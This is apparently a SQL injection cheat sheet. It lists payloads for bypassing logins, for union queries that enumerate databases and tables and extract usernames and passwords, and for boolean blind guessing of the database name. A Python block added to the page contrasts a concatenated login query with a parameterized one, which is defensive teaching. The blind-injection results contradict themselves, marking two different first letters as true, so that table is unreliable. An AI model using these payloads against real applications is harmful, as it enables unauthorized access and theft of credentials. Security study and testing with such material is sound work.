SQL Injection
Bypass authentication
| Query | Purpose |
|---|---|
| `admin' or '1'='1` | Bypass basic authentication |
| `admin')-- -` | Bypass basic authentication with comments |
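
Why the two payloads above succeed against a login query built by string concatenation, and why a parameterized query rejects them, shown as an added example that is not part of the original page. It assumes an in-memory SQLite database; the function names and the sample password are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data. The users(username, password) layout follows the
    # page's own union payload; the plaintext password is only for brevity.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so quotes and comment markers in it
    # become part of the statement the database parses.
    sql = ("SELECT username FROM users WHERE (username = '" + username +
           "' AND password = '" + password + "')")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders pass the values separately from the statement, so the
    # payload is compared as a literal string and cannot alter the WHERE clause.
    sql = "SELECT username FROM users WHERE (username = ? AND password = ?)"
    return db.execute(sql, (username, password)).fetchone() is not None

# The two rows of the table above, submitted as the username.
PAYLOADS = ["admin' or '1'='1", "admin')-- -"]

def compare(payloads=PAYLOADS):
    # Maps each payload to (vulnerable result, parameterized result),
    # always with a wrong password.
    db = make_db()
    return {p: (login_vulnerable(db, p, "wrong"),
                login_parameterized(db, p, "wrong"))
            for p in payloads}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(f"{payload!r:22} vulnerable={vuln} parameterized={safe}")
```
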
Union Injection
| Query | Purpose |
|---|---|
| `wok' order by 1-- -` | Detect the number of columns using order by |
| `wok' UNION select 1,2,3-- -` | Detect the number of columns using Union injection |
| `wok' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -` | Get all databases |
| `wok' union select table_name,2,3,4,5,6 from information_schema.tables where table_schema=database();-- -` | Get all tables |
| `wok' union select username,password,3,4,5,6 from users;-- -` | Get username and password |
Blind SQL Boolean Based
Check database length
| Query | Result |
|---|---|
| `wok' and (length(database())) = 12-- -` | false |
| `wok' and (length(database())) > 12-- -` | true |
| `wok' and (length(database())) = 13-- -` | true |
Guess the database name character by character
| Query | Result |
|---|---|
| `wok' and (substr(database(),1,1))='t'-- -` | true |
| `wok' and (substr(database(),1,1))='s'-- -` | true |
| `wok' and (substr(database(),1,2))='sa'-- -` | false |
| `wok' and (substr(database(),1,2))='sq'-- -` | true |
| `wok' and (substr(database(),1,13))='sql_injection'-- -` | true |